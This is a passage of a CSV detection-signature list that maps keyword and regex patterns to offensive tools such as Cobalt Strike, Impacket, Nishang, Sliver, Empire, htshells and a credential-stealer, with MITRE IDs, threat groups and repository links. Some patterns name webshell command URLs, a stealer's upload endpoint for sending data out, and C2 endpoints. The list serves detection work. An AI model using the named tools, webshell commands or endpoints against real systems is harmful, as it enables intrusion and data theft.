APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http1.x64.bin*",".{0,1000}http1\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*http1.x64.dll*",".{0,1000}http1\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*HTTPAES256Handler.*",".{0,1000}HTTPAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattacks/*.py*",".{0,1000}httpattacks\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*http-c2_test.go*",".{0,1000}http\-c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*HTTPClient.post('https://httpbin.org/post*",".{0,1000}HTTPClient\.post\(\'https\:\/\/httpbin\.org\/post.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*HttpEvilClippyController*",".{0,1000}HttpEvilClippyController.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*HTTP-Login.ps1*",".{0,1000}HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*httpntlm.go*",".{0,1000}httpntlm\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httpntlm.old*",".{0,1000}httpntlm\.old.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httppayload.bin*",".{0,1000}httppayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*HttpProxyScan_Log4J2.py*",".{0,1000}HttpProxyScan_Log4J2\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*http-redwarden*",".{0,1000}http\-redwarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http-request-smuggler-all.jar*",".{0,1000}http\-request\-smuggler\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https://*.gofile.io/uploadFile*",".{0,1000}https\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay 
network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*/.htaccess?c=cmd*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/.htaccess?c=uname -a*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/releases/download/*/lse.sh*",".{0,1000}https\:\/\/.{0,1000}\/releases\/download\/.{0,1000}\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege 
escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*https://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}https\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*https://0.0.0.0:1337*",".{0,1000}https\:\/\/0\.0\.0\.0\:1337.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*https://127.0.0.1/dns-query*",".{0,1000}https\:\/\/127\.0\.0\.1\/dns\-query.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*https://127.0.0.1:5000/register*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/register.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - 
T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:5000/results/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/results\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:5000/tasks/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/tasks\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" 
"*https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design*",".{0,1000}https\:\/\/5pider\.net\/blog\/2024\/01\/27\/modern\-shellcode\-implant\-design.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*https://amsi.fail/*",".{0,1000}https\:\/\/amsi\.fail\/.{0,1000}","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://api.localxpose.io/api/v2/downloads/loclx-darwin-amd64.zip*",".{0,1000}https\:\/\/api\.localxpose\.io\/api\/v2\/downloads\/loclx\-darwin\-amd64\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
